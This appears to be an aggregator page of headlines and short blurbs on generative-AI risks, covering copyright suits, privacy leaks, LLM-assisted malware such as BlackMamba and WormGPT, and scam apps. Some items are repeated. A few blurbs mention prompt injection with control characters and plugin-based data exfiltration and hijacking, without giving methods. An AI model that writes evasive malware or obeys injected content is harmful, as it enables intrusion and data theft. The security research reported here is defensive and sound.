ChatGPT-aided ransomware in China results in four arrests as AI raises cybersecurity concerns | South China Morning Post
Things are about to get a lot worse for Generative AI
A full of spectrum of infringment The cat is out of the bag: Generative AI systems like DALL-E and ChatGPT have been trained on copyrighted materials; OpenAI, despite its name, has not been transparent about what it has been trained on. Generative AI systems are fully capable of producing materials that infringe on copyright. They do not inform users when they do so. They do not provide any information about the provenance of any of the images they produce. Users may not know when they produce any given image whether they are infringing.
The Times Sues OpenAI and Microsoft Over A.I. Use of Copyrighted Work
Millions of articles from The New York Times were used to train chatbots that now compete with it, the lawsuit said.
Personal Information Exploit on OpenAI’s ChatGPT Raise Privacy Concerns
Last month, I received an alarming email from someone I did not know: Rui Zhu, a Ph.D. candidate at Indiana University Bloomington. Mr. Zhu had my email address, he explained, because GPT-3.5 Turbo, one of the latest and most robust large language models (L.L.M.) from OpenAI, had delivered it to him.
A Closer Look at ChatGPT's Role in Automated Malware Creation
As the use of ChatGPT and other artificial intelligence (AI) technologies becomes more widespread, it is important to consider the possible risks associated with their use. One of the main concerns surrounding these technologies is the potential for malicious use, such as in the development of malware or other harmful software. Our recent reports discussed how cybercriminals are misusing the large language model’s (LLM) advanced capabilities: We discussed how ChatGPT can be abused to scale manual and time-consuming processes in cybercriminals’ attack chains in virtual kidnapping schemes. We also reported on how this tool can be used to automate certain processes in harpoon whaling attacks to discover “signals” or target categories.
Microsoft Temporarily Blocked Internal Access to ChatGPT, Citing Data Concerns
The company later restored access to the chatbot, which is owned by OpenAI.
AI companies have all kinds of arguments against paying for copyrighted content
The biggest companies in AI aren’t interested in paying to use copyrighted material as training data, and here are their reasons why.
ChatGPT fails in languages like Tamil and Bengali
Outside of English, ChatGPT makes up words, fails logic tests, and can't do basic information retrieval.
Don’t you (forget NLP): Prompt injection with control characters in ChatGPT
Like many companies, Dropbox has been experimenting with large language models (LLMs) as a potential backend for product and research initiatives. As interest in leveraging LLMs has increased in recent months, the Dropbox Security team has been advising on measures to harden internal Dropbox infrastructure for secure usage in accordance with our AI principles. In particular, we’ve been working to mitigate abuse of potential LLM-powered products and features via user-controlled input.
WormGPT - The Generative AI Tool Cybercriminals Are Using to Launch BEC Attacks
In this blog post, we'll look at the use of generative AI, including OpenAI's ChatGPT, and the cybercrime tool WormGPT, in BEC attacks.
WormGPT: New AI Tool Allows Cybercriminals to Launch Sophisticated Cyber Attacks
A new generative AI cybercrime tool called WormGPT is making waves in underground forums. It empowers cybercriminals to automate phishing attacks.
ChatGPT creates mutating malware that evades detection by EDR
A global sensation since its initial release at the end of last year, ChatGPT's popularity among consumers and IT professionals alike has stirred up cybersecurity nightmares about how it can be used to exploit system vulnerabilities. A key problem, cybersecurity experts have demonstrated, is the ability of ChatGPT and other large language models (LLMs) to generate polymorphic, or mutating, code to evade endpoint detection and response (EDR) systems.
ChatGPT Plugins: Data Exfiltration via Images & Cross Plugin Request Forgery
Plugins can return malicious content and hijack your AI.
“FleeceGPT” mobile apps target AI-curious to rake in cash
Interest in OpenAI’s latest version of its interactive language model has spurred a new wave of scam apps looking to cash in on the hype
OpenAI’s regulatory troubles are just beginning
OpenAI managed to appease Italian data authorities and lift the country’s effective ban on ChatGPT last week, but its fight against European regulators is far from over.
Bad Actors Are Joining the AI Revolution: Here’s What We’ve Found in the Wild
Follow security researchers as they uncover malicious packages on open-source registries, trace bad actors to Discord, and unveil AI-assisted code.
AI-Powered 'BlackMamba' Keylogging Attack Evades Modern EDR Security
Researchers warn that polymorphic malware created with ChatGPT and other LLMs will force a reinvention of security automation.
Samsung Fab Workers Leak Confidential Data While Using ChatGPT
Samsung fab personnel reportedly used ChatGPT to optimize operations and create presentations, leaking confidential data to the third-party AI.
The criminal use of ChatGPT – a cautionary tale about large language models
In response to the growing public attention given to ChatGPT, the Europol Innovation Lab organised a number of workshops with subject matter experts from across Europol to explore how criminals can abuse large language models (LLMs) such as ChatGPT, as well as how it may assist investigators in their daily work.
Privacy Violations Shutdown OpenAI ChatGPT and Beg Investigation
ChatGPT for a long time on March 20th posted a giant orange warning on top of their interface that they’re unable to load chat history.
BlackMamba ChatGPT Polymorphic Malware | A Case of Scareware or a Wake-up Call for Cyber Security?
The rise of publicly-accessible Al models like ChatGPT has produced some interesting attempts to create malware. How seriously should defenders take them?
"Fobo" Trojan distributed as ChatGPT client for Windows
Attackers are distributing malware disguised as a ChatGPT desktop client for Windows offering “precreated accounts”
The Growing Threat of ChatGPT-Based Phishing Attacks
Cyble analyzes how Threat Actors are using the recent buzz around ChatGPT to launch Phishing attacks using various methods.
IoC detection experiments with ChatGPT
We decided to check what ChatGPT already knows about threat research and whether it can help with identifying simple adversary tools and classic indicators of compromise, such as well-known malicious hashes and domains.
OPWNAI : Cybercriminals Starting to Use ChatGPT
At the end of November 2022, OpenAI released ChatGPT, the new interface for its Large Language Model (LLM), which instantly created a flurry of interest in AI and its possible uses. However, ChatGPT has also added some spice to the modern cyber threat landscape as it quickly became apparent that code generation can help less-skilled threat actors effortlessly launch cyberattacks. In Check Point Research’s (CPR) previous blog, we described how ChatGPT successfully conducted a full infection flow, from creating a convincing spear-phishing email to running a reverse shell, capable of accepting commands in English. The question at hand is whether this is just a hypothetical threat or if there are already threat actors using OpenAI technologies for malicious purposes. CPR’s analysis of several major underground hacking communities shows that there are already first instances of cybercriminals using OpenAI to develop malicious tools. As we suspected, some of the cases clearly showed that many cybercriminals using OpenAI have no development skills at all. Although the tools that we present in this report are pretty basic, it’s only a matter of time until more sophisticated threat actors enhance the way they use AI-based tools for bad.
Armed With ChatGPT, Cybercriminals Build Malware And Plot Fake Girl Bots
Users of underground forums start sharing malware coded by OpenAI’s viral sensation and dating scammers are planning on creating convincing fake girls with the tool. Cyber prognosticators predict more malicious use of ChatGPT is to come.
Samsung Fab Workers Leak Confidential Data While Using ChatGPT
Samsung fab personnel reportedly used ChatGPT to optimize operations and create presentations, leaking confidential data to the third-party AI.
Privacy Violations Shutdown OpenAI ChatGPT and Beg Investigation
ChatGPT for a long time on March 20th posted a giant orange warning on top of their interface that they’re unable to load chat history.
BlackMamba ChatGPT Polymorphic Malware | A Case of Scareware or a Wake-up Call for Cyber Security?
The rise of publicly-accessible Al models like ChatGPT has produced some interesting attempts to create malware. How seriously should defenders take them?
"Fobo" Trojan distributed as ChatGPT client for Windows
Attackers are distributing malware disguised as a ChatGPT desktop client for Windows offering “precreated accounts”